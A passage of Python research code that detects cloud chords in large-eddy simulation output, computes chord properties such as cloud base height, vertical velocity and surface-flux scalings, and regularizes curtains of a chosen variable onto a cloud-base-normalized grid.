ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
thl_2d = np.hstack([thl_2d ,np.array(thl_3d.reshape((nz,nx*ny)))])
qt_2d = np.hstack([qt_2d ,np.array(qt_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del thl_3d
del qt_3d
#hopefully this helps
gc.collect()
#Getting anomalies of thl and qt
qt_2d[:,:] = (qt_2d.transpose() - qt_prof[it,:]).transpose()
thl_2d[:,:] = (thl_2d.transpose() - thl_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which devided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, str(V_ref)[:4], str(time_resolution)[:4] )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
#dt_1d = t_1d*0
#dt_1d[1:] = t_1d[1:]-t_1d[:-1]
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
thl_2d = np.zeros((nz,1))
qt_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Use to have a different method using nans that doesn:t work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>1e-6)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find c base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
### Clustering 1D
#Now we simply go through all cloudy timesteps and detect chords
#If they fulful chord time requirements and have a number of values which fulfills cell_min they are counted as a chord
#and their properties are calculatted immediately
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
chord_idx_list = []
while t_cloudy_idx < len(cbl_cl_idx)-1:# and n_curtain<100*it: ####################################GO HERE TO SET MAXIMUM CURTAIN
#print(t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
#Originally only cared if they fulfilled cloud criteria, but now I also hard coded that neighboring cells always count
##Check if the index of the next cloudy cell is the same as the next index in total, if so the cells are connected
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
#Checking if it fulfils chord criteria regaring time
#we also added a minimum height of 100 m to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
ch_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
ch_duration = 0
if ch_duration>t_min and ch_duration<t_max and chord_z_min > 4:
if t_chord_end-t_chord_begin>cell_min-1:
n_chords += 1
#Getting the chord beginning and end
idx_beg_chord = cbl_cl_idx[t_chord_begin]
idx_end_chord = cbl_cl_idx[t_chord_end]
time_beg_chord = t_1d[idx_beg_chord]
time_end_chord = t_1d[idx_end_chord]
#chord_idx_list.append(list(cbl_cl_idx[t_chord_begin:t_chord_end]))
#list of relevant chord indexes
ch_idx_l = list(cbl_cl_idx[t_chord_begin:t_chord_end])
#getting V_ref if data_dim_flag==1. Is calculated directly from the cloud base speeds
if data_dim_flag==1:
u_ref=np.mean(u_2d[cl_base[ch_idx_l],ch_idx_l])
v_ref=np.mean(v_2d[cl_base[ch_idx_l],ch_idx_l])
V_ref=np.sqrt(u_ref**2+v_ref**2)
### Now appending chord properties
chord_timesteps.append(t_chord_end-t_chord_begin)
chord_duration.append(ch_duration)
chord_length.append(ch_duration*V_ref)
tmp_base_height = np.percentile(cl_base[ch_idx_l],base_percentile)*dz
chord_height.append(tmp_base_height) #25th percentile of cloud base
surf_b_flux = np.mean(bflux_s_1d[idx_beg_chord:idx_end_chord])
w_star = (tmp_base_height*surf_b_flux)**(1./3.)
surf_qt_flux = np.mean(qtflux_s_1d[idx_beg_chord:idx_end_chord])
qt_star = surf_qt_flux/w_star
surf_thl_flux = np.mean(thlflux_s_1d[idx_beg_chord:idx_end_chord])
thl_star = surf_thl_flux/w_star
chord_w_star.append(w_star )
chord_thl_star.append(thl_star )
chord_qt_star.append(qt_star )
chord_w_base.append(np.mean(w_2d[cl_base[ch_idx_l],ch_idx_l]))
chord_w.append(np.mean(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_thl.append(np.mean(thl_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
#get a fourth and 3/4 of the cloud base
cl_base_25_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)/4.)
cl_base_75_idx = cl_base[ch_idx_l]*0 + int(np.percentile(cl_base[ch_idx_l],base_percentile)*3./4.)
#print ('cl base idx:',np.percentile(cl_base[ch_idx_l],base_percentile),'clbase/4:',cl_base_25_idx[0],'clbase3/4:',cl_base_75_idx[0])
chord_thl_25.append(np.mean(thl_2d[cl_base_25_idx,ch_idx_l]))
chord_thl_75.append(np.mean(thl_2d[cl_base_75_idx,ch_idx_l]))
chord_qt.append(np.mean(qt_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
chord_qt_75.append(np.mean(qt_2d[cl_base_75_idx,ch_idx_l]))
chord_qt_25.append(np.mean(qt_2d[cl_base_25_idx,ch_idx_l]))
chord_w_flux.append(np.sum(w_2d[cl_base[ch_idx_l]-1,ch_idx_l]))
w_base_vec = w_2d[cl_base[ch_idx_l]-1,ch_idx_l]
chord_w_up.append(np.mean(w_base_vec[w_base_vec>0.0]))
tmp_w_per = np.percentile(w_base_vec,percentiles)
if len(w_base_vec[w_base_vec>0.0])>0:
tmp_w_per_up = np.percentile(w_base_vec[w_base_vec>0.0],percentiles)
else:
tmp_w_per_up = np.zeros(n_percentiles)
tmp_w_per_up[:] = 'nan'
chord_w_per = np.vstack([chord_w_per,tmp_w_per])
chord_w_per_up = np.vstack([chord_w_per,tmp_w_per_up])
if data_dim_flag==1:
chord_time.append(np.mean(t_1d[ch_idx_l]))
if data_dim_flag==3:
chord_time.append(time_prof[it])
t_cloudy_idx += 1
time3 = ttiimmee.time()
print('iterable: ',it)
print('n_chords: ',n_chords)
print('number of time points included: ',len(cbl_cl_idx))
#Does it matter if I turn these from lists to arrays? Fuck it, will do it anyway
chord_timesteps=np.asarray(chord_timesteps)
chord_duration =np.asarray(chord_duration)
chord_length =np.asarray(chord_length)
chord_height =np.asarray(chord_height)
chord_w_base =np.asarray(chord_w_base)
chord_w_star =np.asarray(chord_w_star)
chord_thl_star =np.asarray(chord_thl_star)
chord_qt_star =np.asarray(chord_qt_star)
chord_w =np.asarray(chord_w)
chord_w_up =np.asarray(chord_w_up)
chord_w_flux =np.asarray(chord_w_flux)
chord_thl =np.asarray(chord_thl)
chord_thl_25 =np.asarray(chord_thl_25)
chord_thl_75 =np.asarray(chord_thl_75)
chord_qt =np.asarray(chord_qt)
chord_qt_25 =np.asarray(chord_qt_25)
chord_qt_75 =np.asarray(chord_qt_75)
chord_time =np.asarray(chord_time)
#Saving
print('all chords: ',len(chord_duration))
save_string_base = 'chord_prop_'+date+'_d'+str(data_dim_flag)+'_ct'+str(chord_times)
if N_it_min>0:
save_string_base = save_string_base+'_Nmin'+str(N_it_min)
if N_it_max<1e9:
save_string_base = save_string_base+'_Nmax'+str(n_iter)
save_string_base = save_string_base+'_'+special_name+'_N'+str(n_chords)
filename_chord_panda = directory_output+save_string_base+'.pkl'
data_for_panda = list(zip(chord_timesteps,chord_duration,chord_length,chord_height,chord_w_base,chord_w,chord_w_flux,chord_time,chord_w_up,chord_w_per,chord_w_per_up,
chord_w_star,chord_thl_star,chord_qt_star,
chord_thl,chord_thl_25,chord_thl_75,chord_qt,chord_qt_25,chord_qt_75))
df = pd.DataFrame(data = data_for_panda, columns=['timesteps','duration','length','height','w_base','w','w_flux','time','w up','w per','w per up',
'w star','thl star','qt star',
'thl','thl 25','thl 75','qt','qt 25','qt 75'])
df.to_pickle(filename_chord_panda)
time_end = ttiimmee.time()
print('total run time of proc_chords in minutes: ',(time_end-time_begin)/60.)
print(':')
print(':')
print('chordlength properties saved as panda in ',filename_chord_panda)
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
print(':')
return
#turned into a function
#removed the possibility to loop over multiple dates, if you want to do that call the function repeatedly
#Should be able to work for any variable in the column output, or for any 3D variable as long as it is named the same as the file.
#If the input data is a 3D field it will always go over x and y directions
#Two different scale_flags added to rotate the curtain to point upwind.
#TODO
#plot_flag disabled for the mean time
def proc_beard_regularize(reg_var = 'w',
date_str='20160611',
directory_input='/data/testbed/lasso/sims/',
directory_output = 'data_curtains/',
data_dim_flag=1,
base_smoothing_flag=2,
plot_curtains_flag = 0,
base_percentile = 25,
special_name='',
scale_flag=2,
chord_times = 0,
anomaly_flag = 0,
N_it_max=1e9,
N_it_min=0,
size_bin_flag=0,
N_bins=12,
bin_size = 250,
curtain_extra = 1.0,
chord_max = 1e9,
boundary_scaling_flag = 0
):
# reg_var = variable that will be regularized
# plot_curtains_flag: 0 nothing, 1 plots pre and post regularization plots of reg_var
# data_dim_flag: 1 = column, 3 = 3D snapshot
# time_slice_curtain: 0 only puts out the total sums, 1: adds a seperate output for each time slice, is needed for scale_flag
# scale_flag: If 0, nothing, if 1, it scales the output by u/sqrt(u^2+v^2) and flips the vector if u>0. Is set to 0 if data_dim_flag==1
# 1 the ref_lvl used is determined from the mean cloud base height
# 2, similar to 1 but now using a profile
#
# base_smoothing_flag: 0 use mix of percentile and cloud base as done my Neil, 1: smooth out base after setting it with running average 2: just use percentile defined by base_percentile
# base_percentile: percentile used to find chordlength bottom
# chord_times: 0 use Neils values, use values that fit model output exactly with not gap possible
# anomaly_flag: 0 use reg_var as it is. 1 use reg_var - profile. Works easiest for 3d output, 1d_flag needs to use the closet mean profile
# directory_input = '/data/testbed/lasso/sims/' #+date
# N_it_max = maximum number of iterables, 3D timesteps or column files. Used for testing things quickly
# size_bin_flag bins the beards by their chord_lenth. Currently using 8 bins of 250 meters length to get started. The lowest bin should be empty, because we only calculate curtains when at least curtain_min is used
# curtain_extra: Regularized chord length before and after in the curtain, default is 1
# chord_max: Maximum number of chords. If data_dim_flag=3 it will jump to the y direction when chord_max/2 is reached
# boundary_scaling_flag: 0 nothing, 1 uses the surface fluxes and cloud base height to calculate either w/w*, thl'/thl*, or qt'/qt*
time_begin = ttiimmee.time()
dz = 25.0 #39.0625 #Is recalculated from the profile file later on
dx = 25.0
date = date_str
#1D clustering parameters in seconds, taken to agree with Lareau
if chord_times == 0:
t_gap = 20
t_min = 30
t_max = 120000
cell_min = 3 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed to convert into a curtain
# #1D clustering parameters,
#set super strict
if chord_times == 1:
t_gap = 0.#No gaps allowed!
t_min = 0
t_max = 1e9
cell_min = 10 #Minimal number of cells needed per chord
curtain_min = 10 #Minimal number of cells needed per curtain
#value used to determine existence of cloud
ql_min = 1e-5
z_min = 10 #Index of minimum z_vlvl of the cbl
#z_min = 0 #Index of minimum z_vlvl of the cbl
#Flag clean up
if data_dim_flag==1:
scale_flag=0
#Creating dictionary to save all properties
settings_dict = {
'reg_var': reg_var,
'date_str':date_str,
'directory_input':directory_input,
'data_dim_flag':data_dim_flag,
'base_smoothing_flag':base_smoothing_flag,
'plot_curtains_flag' :plot_curtains_flag,
'base_percentile':base_percentile,
'special_name':special_name,
'scale_flag':scale_flag,
'chord_times':chord_times,
'anomaly_flag':anomaly_flag,
'N_it_max':N_it_max,
'N_it_min':N_it_min,
'size_bin_flag':size_bin_flag,
'bin_size':bin_size,
'N_bins':N_bins,
'curtain_extra':curtain_extra
}
#moved to an inner function to avoid issues with global and local variables
def func_curtain_reg(input_2d_field):
#function regularizes to cloud base
#2019-03-20: added smoother to hopefully avoid impact of harsch jumps
#2019-03-28: Added simplified version for base_smoothing_flag == 2 which gets rid of 1D pre interpolation
#I originally used interp2d, tried griddata but it was a lot slower
#Calculating the regularized t axis but for original resolution
#It is expected to go a bit beyond -1.5 and 1.5, total width defined by curtain_extra
#takes the original time vector, subtracts it by mean time, then scales it by 1/(time_end_chord-time_beg_chord)
t_reg_orig = t_1d[idx_beg_curtain:idx_end_curtain]-(time_beg_chord+time_end_chord)/2.
t_reg_orig = t_reg_orig/(time_end_chord-time_beg_chord)
#Now we calculate the new regularized grid with the correct vertical but low/original horizontal/time resolution
#mesh_t_low_z_high_x,mesh_t_low_z_high_z = np.meshgrid(t_reg_orig,z_reg_mid) #seems not to be needed
var_t_low_z_high = np.zeros([curtain_cells,n_z_reg])
#introducing z_idx_base vector
#Assigning reference cloud base where no cloud present
z_idx_base=cl_base*1.0+0.0
z_idx_base[:] = z_idx_base_default
for i in range(idx_beg_chord,idx_end_chord):
if i>idx_beg_chord-1 and i<idx_end_chord and cl_base[i]<cbl_1d[i]:
z_idx_base[i] = cl_base[i]
#Here the smoother comes into play:
#We started with a simple 5 cell running mean,
#But now we are making it a function of the chordlength, using a 0.1 running mean
if base_smoothing_flag ==1:
z_idx_base_smooth = z_idx_base*1.0
N = int(np.floor(idx_end_chord-idx_beg_chord)*0.1)
for i in range(idx_beg_chord-N,idx_end_chord+N):
z_idx_base_smooth[i] = sum(z_idx_base[i-N:i+N])/(2*N)
z_idx_base[:] = z_idx_base_smooth[:]
if base_smoothing_flag==2:
#just put the percentile back
z_idx_base[:] = z_idx_base_default
#default version for variable base height
if base_smoothing_flag<2:
#Now for each of the columns of the original curtain a vertical interpolation is done
for i in range(idx_beg_curtain,idx_end_curtain):
#assigining column value
var_orig_col = input_2d_field[:,i]
#Regularizing the z axes so that cloud base is at 1
d_z_tmp = 1.0/z_idx_base[i]
nz = var_orig_col.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#HAve to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_col = np.hstack([var_orig_col[0],var_orig_col])
#1D vertical interpolation to get the right columns and asign them one by one to w_x_low_z_high
#f = interp1d(z_reg_orig, var_orig_col, kind='next')
f = interp1d(z_reg_orig, var_orig_col, kind='nearest')
try:
var_reg_inter = f(z_reg_mid)
except:
print(z_idx_base[i])
print(z_reg_orig)
print(z_reg_mid)
var_t_low_z_high[i-idx_beg_curtain,:] = var_reg_inter
#Now that w_x_low_z_high we have to interpolate 2D onto the rull regularized grid
#print(t_reg_orig.shape,z_reg_mid.shape)
f = interp2d(t_reg_orig, z_reg_mid, var_t_low_z_high.transpose(), kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
#constant base height version
if base_smoothing_flag==2:
#Regularizing the z axes so that cloud base is at 1, since z_idx_base is the same everywhere I just use idx_beg_curtain as one.
i=idx_beg_curtain
d_z_tmp = 1.0/z_idx_base[i]
var_orig_2d = input_2d_field[:,idx_beg_curtain:idx_end_curtain]
nz = var_orig_2d.shape[0]
z_reg_orig_top = d_z_tmp*nz- d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#Have to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
var_orig_2d = np.vstack([var_orig_2d[0,:],var_orig_2d])
f = interp2d(t_reg_orig, z_reg_orig,var_orig_2d, kind='linear')
var_curtain = f(t_reg_mid,z_reg_mid)
return var_curtain
#Creating regularized grid.
d_reg = 0.005
n_z_reg = int(1.5/d_reg)
n_t_reg = int((1+2*curtain_extra)/d_reg)
t_reg_bound = np.linspace(-0.5-curtain_extra,0.5+curtain_extra ,n_t_reg+1)
t_reg_mid = np.linspace(-0.5-curtain_extra+d_reg/2,0.5+curtain_extra-d_reg/2 ,n_t_reg)
z_reg_bound = np.linspace(0,1.5 ,n_z_reg+1)
z_reg_mid = np.linspace(0+d_reg/2,1.5-d_reg/2 ,n_z_reg)
mesh_curtain_t,mesh_curtain_z = np.meshgrid(t_reg_mid,z_reg_mid)
var_curtain = np.zeros([n_t_reg,n_z_reg])
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_curtain_up = 0
n_curtain_dw = 0
if size_bin_flag==1:
N_bins = 12
n_curtain_bin = np.zeros([N_bins])
n_curtain_bin_up = np.zeros([N_bins])
n_curtain_bin_dw = np.zeros([N_bins])
var_curtain_bin_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_up_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
var_curtain_bin_dw_sum = np.zeros([N_bins,n_t_reg,n_z_reg])
mid_bin_size = np.linspace(125,-125+N_bins*250,N_bins)
print('mid_bin_size',mid_bin_size)
print('looking into date: ',date)
if data_dim_flag==1:
filename_column = []
#uses glob to get all files which contain column.
column_files = glob.glob(directory_input+date+'/*column*.nc')
for c_file in column_files:
filename_column.append(c_file)
print('filename column included:',c_file)
if data_dim_flag==3:
filename_w = directory_input+date+'/w.nc'
filename_l = directory_input+date+'/ql.nc'
file_w = Dataset(filename_w,read='r')
file_ql = Dataset(filename_l,read='r')
[nz, nx, ny] = get_zxy_dimension(filename_l,'ql')
#getting variable to be regularized
filename_var = directory_input+date+'/'+reg_var+'.nc'
file_var = Dataset(filename_var,read='r')
filename_prof=glob.glob(directory_input+date+'/*default?0*.nc')[0]
#if date=='bomex':
# filename_prof=directory_input+date+'/bomex.default.0000000.nc'
file_prof = Dataset(filename_prof,read='r')
extra_string = ''
n_chords = 0
#This now a bit trickier then for the 3D version. Will have to calculate a vector for the lower time resolution of the profile,
#Then latter apply the nearest value to the full 1d time vec
#First loading surface variables from default profile
print('calculating cbl height from profile file')
T = file_prof['thl'][:,0]
p = file_prof['p'][:,0]*0.0+99709
qt = file_prof['qt'][:,0]
w2 = file_prof['w2'][:,:]
nz_prof = w2.shape[1]
var_prof = file_prof[reg_var][:,:] #needed for anomaly processing
#Just grabbing this to calculate dz
z_prof = file_prof['z'][:]
dz = z_prof[1]-z_prof[0]
print('dz: ',dz)
#for boundary scaling
total_surf_buoy_flux = file_prof['bflux'][:,1]
total_surf_thl_flux = file_prof['thlflux'][:,1]
total_surf_qt_flux = file_prof['qtflux'][:,1]
time_prof = file_prof['time'][:]
cbl_1d_prof = time_prof*0.0
#Hack together the Lifting condensation level LCL
qt_pressure = p*qt
sat_qv = 6.112*100 * np.exp(17.67 * (T - 273.15) / (T - 29.65 ))
#rel_hum = np.asmatrix(qt_pressure/sat_qv)[0]
rel_hum = qt_pressure/sat_qv
#Dewpoint
A = 17.27
B = 237.7
alpha = ((A * (T- 273.15)) / (B + (T-273.15)))
alpha = alpha + np.log(rel_hum)
dewpoint = (B * alpha) / (A - alpha)
dewpoint = dewpoint + 273.15
LCL = 125.*(T-dewpoint)
LCL_index = np.floor(LCL/dz)
#now calculate the cbl top for each profile time
for tt in range(len(time_prof)):
w_var = 1.0
z=z_min
while w_var > 0.08:
z += 1
w_var = w2[tt,z]
#w_var = np.var(w_1d[z,:])
#Mimimum of LCL +100 or variance plus 300 m
cbl_1d_prof[tt] = min(z+300/dz,LCL_index[tt])
#To avoid issues later on I set the maximum cbl height to 60 % of the domain height, but spit out a warning if it happens
if cbl_1d_prof[tt]>0.6*nz_prof:
print('warning, cbl height heigher than 0.6 domain height, could crash regularization later on, timestep: ',tt)
cbl_1d_prof[tt] = math.floor(nz*0.6)
print('resulting indexes of cbl over time: ',cbl_1d_prof)
print('calculated LCL: ',LCL_index)
#Now we either iterate over columns or timesteps
if data_dim_flag==1:
n_iter =len(filename_column)
if data_dim_flag==3:
n_iter =len(time_prof)
#Setting curtains for var
var_curtain_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_up_sum = np.zeros([n_t_reg,n_z_reg])
var_curtain_dw_sum = np.zeros([n_t_reg,n_z_reg])
n_curtain = 0
n_chord = 0
n_curtain_up = 0
n_curtain_dw = 0
#for col in filename_column:
n_iter = min(n_iter,N_it_max)
for it in range(N_it_min,n_iter):
print('n_chords: ',n_chords)
print('n_curtain: ',n_curtain)
time1 = ttiimmee.time()
if data_dim_flag ==1:
print('loading column: ',filename_column[it])
file_col = Dataset(filename_column[it],read='r')
w_2d = file_col.variables['w'][:]
w_2d = w_2d.transpose()
ql_2d = file_col.variables['ql'][:]
ql_2d = ql_2d.transpose()
t_1d = file_col.variables['time'][:]
u_2d = file_col.variables['u'][:]
u_2d = u_2d.transpose()
v_2d = file_col.variables['v'][:]
v_2d = v_2d.transpose()
print('t_1d',t_1d)
#Load the var file, even if means that we doable load w_2d or ql_2d
var_2d = file_col.variables[reg_var][:]
var_2d = var_2d.transpose()
#The needed cbl height
cbl_1d = t_1d*0
bflux_s_1d = t_1d*0
qtflux_s_1d = t_1d*0
thlflux_s_1d= t_1d*0
#Now we go through profile time snapshots and allocate the closest full time values to the profile values
dt_2 = (time_prof[1]-time_prof[0])/2
for tt in range(len(time_prof)):
cbl_1d[abs(t_1d-time_prof[tt])<dt_2] = cbl_1d_prof[tt]
bflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_buoy_flux[tt]
qtflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_qt_flux[tt]
thlflux_s_1d[abs(t_1d-time_prof[tt])<dt_2] = total_surf_thl_flux[tt]
#to get anomalies we subtract the closet mean profile
if anomaly_flag==1:
for tt in range(len(time_prof)):
tmp_matrix = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]
tmp_vector = var_prof[tt,:]
#because the vectors don't perfectly align
var_2d[:,abs(t_1d-time_prof[tt])<dt_2] = (tmp_matrix.transpose() - tmp_vector).transpose()
# = var_2d[:,abs(t_1d-time_prof[tt])<dt_2]-var_prof[tt,:]
if data_dim_flag ==3:
if sum(file_prof['ql'][it,:])>0.0:
print('loading timestep: ',it)
ql_3d = grab_3d_field(file_ql ,it,'ql')
w_3d = grab_3d_field(file_w ,it,'w')
var_3d = grab_3d_field(file_var ,it,reg_var)
#Here we have to do all the fuckery to turn the 3D fields into 2d slices with an imaginary time vector
w_2d = np.array(w_3d.reshape((nz,nx*ny)))
ql_2d = np.array(ql_3d.reshape((nz,nx*ny)))
var_2d = np.array(var_3d.reshape((nz,nx*ny)))
#Now we do the same thing with the transposed field, use to be an either or, now just add it on
w_3d = np.transpose( w_3d, (0, 2, 1))
ql_3d = np.transpose(ql_3d, (0, 2, 1))
var_3d = np.transpose(var_3d, (0, 2, 1))
#globals().update(locals())
w_2d = np.hstack([w_2d ,np.array(w_3d.reshape((nz,nx*ny)))])
ql_2d = np.hstack([ql_2d ,np.array(ql_3d.reshape((nz,nx*ny)))])
var_2d = np.hstack([var_2d ,np.array(var_3d.reshape((nz,nx*ny)))])
#Should now be able to delete 3d fields as they aren't needed anymore, not sure if that helps save any memory though
del w_3d
del ql_3d
del var_3d
gc.collect()
#Switching to anomalies if anomaly flag is used
if anomaly_flag==1:
#because the vectors don't perfectly align
var_2d[:,:] = (var_2d.transpose() - var_prof[it,:]).transpose()
#to get the fake time vector we load the wind from the profile data, which devided by the grid spacing gives us a fake time resolution
#we use the calculated cbl+300 meter or lcl as reference height
ref_lvl = cbl_1d_prof[it]
u_ref = file_prof['u'][it,ref_lvl]
v_ref = file_prof['v'][it,ref_lvl]
V_ref = np.sqrt(u_ref**2+v_ref**2)
time_resolution = dx/V_ref
print('time iterative, V_ref, time_resolution',it, V_ref, time_resolution )
print('ref_lvl used to determine reference winds',ref_lvl )
#fake t vector,
t_1d = np.linspace(0,2*nx*ny*time_resolution,2*nx*ny)#+nx*ny*time_resolution*it
else:
#If no clouds are present we pass a very short empty fields over to the chord searcher
print('skipping timestep: ',it,' cause no clouds')
ql_2d = np.zeros((nz,1))
w_2d = np.zeros((nz,1))
var_2d = np.zeros((nz,1))
t_1d = np.zeros(1)
#The needed cbl height, which constant everywhere
cbl_1d = t_1d*0
cbl_1d[:] = cbl_1d_prof[it]
#The needed surface buoyancy flux, which is constant everywhere
bflux_s_1d = t_1d*0 + total_surf_buoy_flux[it]
qtflux_s_1d = t_1d*0 + total_surf_qt_flux[it]
thlflux_s_1d = t_1d*0 + total_surf_thl_flux[it]
time2 = ttiimmee.time()
print('loading time:',(time2-time1)*1.0,)
### Detecting lowest cloud cell is within 300 m of CBL
nt = len(cbl_1d)
cl_base = np.zeros(nt)
#Detecting all cloudy cells
#Use to have a different method using nans that doesn:t work anymore somehow. Now I just set it really high where there is no cloud.
for t in range(nt):
if np.max(ql_2d[:,t])>ql_min :
cl_base[t]=np.argmax(ql_2d[:,t]>ql_min)
else:
cl_base[t]=10000000
cl_base=cl_base.astype(int)
#Now find c base lower than the max height
cbl_cl_idx = np.where((cl_base-cbl_1d[:nt])*dz<0)[0]
cbl_cl_binary = cl_base*0
cbl_cl_binary[cbl_cl_idx]=1
t_cbl_cl=t_1d[cbl_cl_idx]
#Scaling between x and y is calculated here if required. Is skipped if there are less than 2 timesteps, which is what is assigned when no clouds are present
if scale_flag > 0 and t_1d.shape[0]>3:
#calculate the profiles of u and v and their scaling
u_ref_prof = file_prof['u'][it,:]
v_ref_prof = file_prof['v'][it,:]
V_ref_prof = np.sqrt(u_ref_prof**2+v_ref_prof**2)
scaling_factor_x_prof = u_ref_prof/V_ref_prof
scaling_factor_y_prof = v_ref_prof/V_ref_prof
#Using the mean cloud base height as the reference lvl
ref_idx = np.mean(cl_base[cbl_cl_idx])
if scale_flag == 1:
#a new reference level is com
scaling_factor_x = scaling_factor_x_prof[int(ref_idx)]
scaling_factor_y = scaling_factor_y_prof[int(ref_idx)]
print('Scaling flag 1: scaling factor_x: ',scaling_factor_x,' scaling factor_y: ',scaling_factor_y, ' int(ref_idx): ',int(ref_idx))
if scale_flag == 2:
#Regularizing the scaling profiles and interpolation them onto the regularized z axis
d_z_tmp = 1.0/ref_idx
nz = scaling_factor_x_prof.shape[0]
z_reg_orig_top = d_z_tmp*nz-d_z_tmp/2
z_reg_orig = np.linspace(0+d_z_tmp/2,z_reg_orig_top,nz)
#HAve to add 0 to the z_reg_orig to enable interpolation
z_reg_orig = np.hstack([[0],z_reg_orig])
scaling_factor_x_prof_ext = np.hstack([scaling_factor_x_prof[0],scaling_factor_x_prof])
scaling_factor_y_prof_ext = np.hstack([scaling_factor_y_prof[0],scaling_factor_y_prof])
#1D vertical interpolation to get the right columns and asign them one by one to w_x_low_z_high
f_x = interp1d(z_reg_orig, scaling_factor_x_prof_ext, kind='nearest')
f_y = interp1d(z_reg_orig, scaling_factor_y_prof_ext, kind='nearest')
scaling_factor_x_inter = f_x(z_reg_mid)
scaling_factor_y_inter = f_y(z_reg_mid)
print('Scaling flag 2:, mean scaling_factor_x_inter: ',np.mean(scaling_factor_x_inter),
' mean scaling_factor_y_inter: ',np.mean(scaling_factor_y_inter))
### Clustering 1D
#Now we simply go through all cloudy timesteps
#As long as the difference to the next cloudy timestep is lower than t_gap it counts as the same cloud
#As an additional contraint, if the cloudy cells are right next to each other they are always counted as consecutive, not matter the time distance between them.
#if the difference is larger than 20s the cloud is over, and a chordlength is created which is a list of all timesteps that below to that chordlength
#However if the duration of the chordlength is lower than t_min or higher than t_max seconds it isn't
#I added an additional constraint that each chord must include at least cell_min cells, because it is possible to get
#Small chord lengths with more than t_min which are mostly gaps.
t_cloudy_idx = 0
#n_chords = 0
chord_idx_list = []
print('iterating through step ',it,'which contains ',len(cbl_cl_idx),'cloudy columns')
while t_cloudy_idx < len(cbl_cl_idx)-1 and n_chords<chord_max:
#print('t_chord_begin',t_chord_begin)
t_chord_begin = t_cloudy_idx
#now connecting all cloudy indexes
while t_cloudy_idx < len(cbl_cl_idx)-1 and (cbl_cl_idx[t_cloudy_idx+1]==cbl_cl_idx[t_cloudy_idx]+1 or t_cbl_cl[t_cloudy_idx+1]-t_cbl_cl[t_cloudy_idx]<t_gap):
t_cloudy_idx += 1
t_chord_end = t_cloudy_idx
#print('t_chord_end',t_chord_end)
#Checking if it fulfils chord criteria regaring time
#we also added a minimum height of 100 m to screen out fog/dew stuff at the surface
if t_chord_end-t_chord_begin>cell_min:
chord_z_min = np.min(cl_base[cbl_cl_idx[t_chord_begin:t_chord_end]])
chord_duration = t_cbl_cl[t_chord_end]-t_cbl_cl[t_chord_begin]
else:
chord_z_min = 0
chord_duration = 0
if chord_duration>t_min and chord_duration<t_max and chord_z_min > 4:
